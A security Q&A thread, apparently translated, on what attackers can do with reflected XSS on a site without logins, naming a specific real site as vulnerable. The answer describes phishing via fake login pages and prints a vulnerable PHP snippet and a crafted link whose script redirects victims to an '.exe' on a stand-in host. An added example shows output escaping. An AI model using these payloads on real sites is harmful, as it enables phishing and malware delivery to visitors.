Question:
I'm not some kind of hacker, but I know some techniques. I'm training in security and got really thoughtful about this issue. Every time I inject a script, it's an alert(), nothing dangerous for the host (for example). I don't have a website, so there would be no way to forward cookies. What is the big risk of an XSS flaw on a site without a DB/login system? I have a real website here ( http://www.verinha.de/commentary_english.htm ) that I found messing around on the internet. Yes, it's a potential flaw; however, as the site doesn't have a login system, I don't know anything a black hat could do. What would real "hackers/crackers" do?
PS: to try it out, I used <script>window.location = "https://www.google.com";</script>. I was forwarded to Google and returned to the page. Nothing happened.
Answer:
There is no single right way to exploit this. Basically, you need to understand who accesses the site and what the users focus on, and often it is not enough to just use one technique. For example:
Let's assume that the users of the site in question have an account on the XPTO site. You could create a redirect or an iframe to a fake XPTO site page with a form and copy this data. As the user entered the site that has the XSS problem on their own, they will not think they are being cheated. Another example would be to include a redirect to an .exe for the purpose of attacking the user's computer. This is commonly seen with bank or e-wallet pages.
In the example in question the XSS is not persistent, that is, it is not saved within the page; possibly there is no database. In this case the technique has to be adapted; it is common to pass the script through GET when the problem involves some form field.
<?php
// reflected XSS: the untrusted query parameter is echoed into the HTML unescaped
$nome = $_GET['nome'];
echo "Bem vindo $nome<br>";
?>
This is an example very similar to the mentioned site; the difference is that the information is passed via a PHP GET parameter and not via a JavaScript prompt. In this case, it would be enough to send users a link such as
http://sitexpto.com.br/?nome=<script>location.href='http://link.para/arquivo.exe';</script>
A variant of this technique was widely used in the days of Orkut. Google already used the "Com conta Google" login by default, but there was an additional parameter called redirect; many sent this URL with a redirect to an .exe file or a fake login page. I know the problem was not XSS related, but I think it's worth mentioning.
On the website http://www.verinha.de there really is an XSS problem, but when analyzing the source code it is possible to see that the result is not stored anywhere, and that it is not possible to supply the value through the URL. In general, there is no practical application in this case, at least not using only this technique.
I hope this has added something.
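As an added illustration (not part of the answer above or the site discussed), here is the answer's reflected-XSS pattern next to a hardened version of the same handler. The function names and the payload URL are assumptions constructed for the example; the only untrusted input is the nome query parameter, as in the answer's snippet.

```php
<?php
// Added example, not code from the original answer.

// Vulnerable form (as in the answer): the raw parameter is concatenated
// into HTML, so a value such as <script>...</script> is executed by the
// browser of whoever opens the crafted link.
function renderGreetingVulnerable(string $nome): string
{
    return "Bem vindo $nome<br>";
}

// Hardened form: HTML-encode the value for the context it lands in
// (element content). ENT_QUOTES also encodes ' and ", so the same helper
// is safe inside a quoted attribute value.
function renderGreetingSafe(string $nome): string
{
    $escaped = htmlspecialchars($nome, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "Bem vindo $escaped<br>";
}

// Constructed input modelled on the answer's example link; the host is a
// placeholder, not a real address.
$payload = "<script>location.href='http://example.invalid/arquivo.exe';</script>";

// The first string contains a live <script> element; the second contains
// only &lt;script&gt; text, which the browser renders literally.
echo renderGreetingVulnerable($payload), PHP_EOL;
echo renderGreetingSafe($payload), PHP_EOL;

// In a real handler, read the parameter with a default and always go
// through the escaping function:
//   $nome = $_GET['nome'] ?? '';
//   echo renderGreetingSafe($nome);
```

Escaping on output is the fix that matters here; a Content-Security-Policy header that disallows inline scripts is a useful second layer but does not replace it.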